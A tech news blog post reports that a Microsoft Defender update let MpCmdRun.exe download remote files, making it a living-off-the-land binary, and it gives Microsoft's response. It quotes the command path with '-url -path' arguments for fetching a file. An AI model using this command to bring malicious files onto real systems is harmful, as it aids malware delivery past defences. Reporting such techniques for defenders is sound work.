Once again, a Microsoft update has caused problems instead of bringing improvements to their product. This time, the issue appeared in Microsoft Defender following an update.

Microsoft Defender Allowing Malware Download

Reportedly, a security researcher has found a bug in Microsoft Defender antimalware that potentially allows malware download.

The problem appeared following a recent feature upgrade with the latest software update. Specifically, the Microsoft Malware Protection Command Line tool MpCmdRun.exe has received an update that now allows downloading files from a remote location.

While the feature isn’t malicious in itself, an attacker can exploit it to load malicious programs onto a target device.

Here’s what the researcher, Mohammad Askar, observed.

He stated that anyone can use Windows Defender to download the desired file via the following path: C:ProgramDataMicrosoftWindows Defenderplatform4.18.2008.9-0MpCmdRun.exe -url -path

Following this discovery, Bleeping Computer could reproduce the exploit. They downloaded a WastedLocker ransomware sample found recently in the Garmin attack.

Is This Really A Problem?

Technically, it’s a serious issue as anyone can download malicious files to the target device via the security tool itself.

However, in a practical scenario, this issue isn’t as serious as it seems. Despite being a LOLBin (living-off-the-land binary), exploiting it is somewhat tricky as Windows Defender scans every file before downloading. Hence, if it detects any malicious file, it will simply block it right away.

In a statement to Forbes, a Microsoft spokesperson confirmed the same,

Despite these reports, Microsoft Defender antivirus and Microsoft Defender ATP will still protect customers from malware. These programs detect malicious files downloaded to the system through the antivirus file download feature.

Nonetheless, since the attack theoretically remains possible, Microsoft needs to fix this at the earliest. Meanwhile, Windows admins and blue teamers have got one more exploit to watch out for.

Let us know your thoughts in the comments.

The following two tabs change content below.

Abeerah has been a passionate blogger for several years with a particular interest towards science and technology. She is crazy to know everything about the latest tech developments. Knowing and writing about cybersecurity, hacking, and spying has always enchanted her. When she is not writing, what else can be a better pastime than web surfing and staying updated about the tech world! Reach out to me at: [email protected]



Source link